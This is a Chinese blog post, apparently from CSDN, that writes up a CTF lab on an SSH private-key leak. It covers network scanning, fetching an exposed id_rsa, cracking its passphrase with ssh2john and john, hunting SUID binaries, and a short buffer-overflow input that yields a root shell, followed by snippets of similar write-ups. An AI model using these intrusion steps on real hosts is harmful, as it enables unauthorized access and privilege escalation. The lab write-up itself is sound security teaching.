CTF实验:ssh泄露

最新推荐文章于 2024-09-28 15:40:33 发布
最新推荐文章于 2024-09-28 15:40:33 发布
阅读量438 收藏 1
点赞数
分类专栏: CTF 文章标签: CTF ssh密钥泄露
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/floyd_art/article/details/103395383
版权

CTF实验:ssh泄露

信息收集

两台虚拟机均为桥接,一台kali一台ssh私钥泄露主机。在kali中输入ifconfig查看网段
在这里插入图片描述
在输入netdiscover 192.168.43.1/24 查询网段主机
在这里插入图片描述
ping 192.168.43.134 发现ping通,那么用nmap探测该ip
在这里插入图片描述

对网页的分析

探测后发现端口号为31337比较可疑,所以在浏览器中输入http://192.168.43.134:31337
查看源代码后没有可疑信息
在这里插入图片描述

隐藏页面分析

利用工具dirb继续探测(也可以用nikto)
在这里插入图片描述
从信息中发现robots和.ssh可疑,那么进入链接后发现了第一个flag
在这里插入图片描述
在这里插入图片描述
之后再看.ssh中的链接,发现里面有私钥id_rsa和authorized_keys文件都下载下来
在这里插入图片描述
从authorized_keys中了解到用户名为simon那么输入ssh -i id_rsa simon@192.168.43.134登录到主机。发现权限不够,
在这里插入图片描述
修改权限chmod 600 id_rsa 再次输入ssh -i id_rsa simon@192.168.43.134后需要输入密码
在这里插入图片描述
那么就要破解密码,

解密 ssh秘钥信息

使用 ssh2john 将id_isa秘钥信息转换为john可以识别的信息。
ssh2john id_isa > isacrack
再解密zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules isacrack
在这里插入图片描述
在这里插入图片描述
得到密码starwars,在输入ssh -i id_rsa simon@192.168.43.134链接主机输入密码
在这里插入图片描述
进入root目录后发现有flag。txt和read_message。

提高到root权限

但打不开文件,权限不够,要提权。cd /root 进入root寻找具有root权限的文件
find / -perm -4000 2>/dev/null
在这里插入图片描述
列表里read_message和之前看到的那个一样出现了两次查看一下cat read_message.c
分析代码后发现可以用溢出攻击,并且发现了第二个flag。
运行read_message,输入SimonQQQQQQQQQQQQQQQ/bin/sh. /bin/sh会溢出
从而提升了权限,并找到了最后一个flag。
在这里插入图片描述

floyd_art
关注
专栏目录
网络安全CTF流量分析-入门5-SSH登录流量和Linux基本操作流量
m0_51198141的博客
11-23 684
这道题还是比较简单的,只要熟悉基本的Linux命令和得到相应的结果就能根据题目找到答案,重点在于打开TCP流量观察,和对Linux系统的熟练度。欢迎师傅们交流沟通
CTF-SSH
weixin_45778981的博客
01-09 3271
CTF-SSH(笔记+总结) 思路:对网络进行扫描,寻找可疑主机,对目标主机进行端口扫描,特别注意大端口和特殊端口,在端口寻找关键文件、可疑文件,注意id_rsa,远程登录目标主机,判断获取用户类型,进行提权最终获取root用户,获取flag。 netdiscover -r ip/netmask nmap -sV ip nmap -A -v ip nmap -O ip dirb http://ip:端口 nikto -host ip ssh -i id_rsa 用户名@ip chmod 600 id_rs
CTF-SSH私钥泄露
最新发布
qq_50299964的博客
09-28 936
CTF-SSH私钥泄露一.信息探测--查看开放的服务--分析探测结果-- 探测大端口的信息 工具:kali Linux 一.信息探测 对于只是给定一个对应IP地址的靶场机器,我们需要用对其进行扫描,探测开放的服务。 渗透其实是针对服务的漏洞探测,然后进行对应的数据包发送,获取机器的最高权限 namp -sV 靶机ip //挖掘开放服务信息 –查看开放的服务 该靶机开放了一个ssh和两个http服务。 –分析探测结果 每一个服务对应计算机的一个端口,.用来进行通信。常用端0~1023端口,在扫描结果
SSH-私密泄露(详)
qq_53030229的博客
10-10 665
我在网上找到的,资源地址,就在前几分钟内有网盘链接,博主比较懒,你们自己动手吧。 SSH-私密泄露前言一、确保攻击机和虚拟机在同一网段二、使用步骤1.引入库2.读入数据 前言 最近一点也不想学习,写篇文章激励一下自己,加油ヾ(◍°∇°◍)ノ゙! 一、确保攻击机和虚拟机在同一网段 两台虚拟机都需要设置,进行网络设置才可以让攻击机能够在同一局域网下搜索到靶机 二、使用步骤 1.引入库 代码如下(示例): 2.读入数据 代码如下(示例): ...
渗透测试---SSH私钥泄露
tzyyyyyy的博客
11-03 945
信息收集之后发现靶机存在ssh服务的私钥泄露 于是进行爆破攻击等方式拿到对应权限 并通过缓冲区溢出攻击拿到root最终权限
CTFSSH密钥泄露实验
weixin_39096432的博客
02-04 478
CTFSSH密钥泄露实验 实验目的: 获取目标主机上的flag 目标主机: 未知 攻 击 机: kali 192.168.114.130 分析: 目前没有任何目标主机的任何信息,此时该做什么呢? 思路:探测信息——构造畸形数据包——异常回应——get shell——提权拿到最高权限 1、探测目标主机的IP地址(与攻击机在同一网段内): netdiscover -r 192.168.114.1/24 —— 在该地址段内探测存活的主机,识别到靶场。 继续用nmap探测靶场开启的服务以及版本: nmap
【愚公系列】2024年03月 《CTF实战:从入门到提升》 009-Web安全入门(PHP文件包含漏洞)
热门推荐
时光隧道
03-01 6万+
PHP文件包含漏洞是指在PHP代码存在安全漏洞,允许攻击者包含并执行恶意文件或代码。PHP文件包含漏洞通常发生在以下两种情况下:动态文件包含:当PHP代码使用动态输入来包含文件时,攻击者可能通过构造恶意输入来包含并执行任意文件。这可能会导致攻击者执行远程代码、读取服务器上的敏感文件,或者执行其他恶意操作。本地文件包含:当PHP代码使用本地文件路径来包含文件时,攻击者可能通过修改文件路径参数来包含并执行任意文件。这可能会导致攻击者读取服务器上的敏感文件,或者执行其他恶意操作。
CTF-SSH服务渗透
IT小学子的博客
05-02 819
CTF-SSH服务渗透信息探测对于SSH服务的22端口的靶场面对HTTP服务80端口开放的端口或者其他端口的靶场挖掘敏感信息ssh密钥进行利用查看根目录文件寻找flagshell 监听暴力破解 信息探测 探测靶场开放的服务与服务的版本 nmap -sV ip地址 探测靶场全部信息 nmap -A -v IP地址 nmap -v -n -A www.baidu.com 探测靶场的操作系统类型与版...
CTF训练笔记(一)- SSH私钥泄露
morrino的博客
01-07 1975
本文作为CTF训练笔记系列的第一章,详细描述了搭建环境时如何配置网络。 总结:细节非常重要,flag往往会藏在意想不到的地方,不要放过任何可疑文件,根据提示逐步挖掘所需信息。[CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
CTF网络安全挑战:解题策略与技术解析
"该课程是关于CTF(Capture The Flag)比赛的Web安全题目解题技巧的详细教程,包括了多个章节,涵盖了多种常见的网络安全漏洞和利用方式。课程旨在帮助学员掌握不同类型的Web安全问题,提升在CTF比赛的竞争力。...
CTF训练之现学现卖--SSH私钥泄露-附件资源
03-02
CTF训练之现学现卖--SSH私钥泄露-附件资源
SSH协议分析
08-19
议能够实现安全的网络远程登录功能,是远程服务配置管理的有力工具,文章论述SSH的基本原理 和实现方法,并结合开源软件OpenSSH,采用虚拟机方式验证SSH技术的应用环境。
CTF实战(一):SSH-私钥泄露
mcc的博客
09-08 820
ssh-私钥泄露 靶机地址:https://pan.baidu.com/s/1mLw3yuqardX3f1F0ocPmkQ 1.主机发现 这里使用了一下二层发现工具netdiscover(netdiscover -r 10.10.3.1/24),发现即使是主动发现也不能准确探测所有足迹,折腾了一段时间,最后还是用nmap的主机发现命令扫除了漏洞机(nmap -sP 10.10.3.0/24) 2....
CTF-SSH协议介绍
weixin_41684949的博客
05-07 732
ssh为Secure Shell 的缩写由IETF的网络小组(Network Working Group)所制定;SSH为建立在应用层基础上的安全协议。ssh是目前较为可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用ssh协议可以有效防止远程管理过程信息泄露问题。ssh最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。ssh在正确使用时可弥补网络的漏洞。ssh客户端适用...
CTF-6.SSH服务渗透
woo233的博客
09-12 1359
SSH为Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定;SSH为建立在应用层基础上的安全协议。SSH是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用ssH协议可以有效防止远程管理过程信息泄露问题。基于TCP 22号端口的服务。在对SSH服务渗透,大部分情况是利用获取的私钥文件,直接使用用户名和私钥文件登录靶场机器,个别情况进行暴力破解获取用户密码,通过用户名和对应用户登录靶场机器。CTF要特别注意。
CTF训练 SSH私钥泄露
梁辰兴的博客
10-15 886
SSH 为 Secure Shell 的缩写,由 IETF 的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程信息泄露问题。SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。SSH在正确使用时可弥补网络的漏洞。SSH客户端适用于多种平台。
CTF-SSH服务渗透代码详细解说
weixin_45441727的博客
03-01 1055
首先,我们先理解什么是SSH协议 SSH是(Secure SHell protocol) 的简写,即(安全外壳协议)。由 IETF 的网络小组(Network Working Group)制定。 以前我们都是使用rsh和telnet的明文传输,这样的话登录时的ID和密码数据就会直接在网络上暴露,相当于你在网络上被别人看的一清二楚。存在安全上的问题。而SSH提供了加密、校验和压缩,使得我们可以很安全的进行远程操作。不过这并不是绝对的,总有加密文件被破解的一天。但是相对与明文加密,这样还是好很多的。毕竟有密码和
【blueteam-ctf-challenges流量取证部分】EscapeRoom Blue Team Challenge
weixin_64836216的博客
11-15 111
这是一道流量分析结合可执行程序木马的逆向题目,难度适
CTF工具:Git泄露利用及Softlysu3分析
资源摘要信息: "githack泄露利用_softlysu3_ctfgithack_githack_CTF之.git泄露_githack下载" 知识点: 1. githack介绍: githack是一种专为Capture The Flag (CTF)比赛设计的工具,它能够帮助参与者有效地利用.git...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值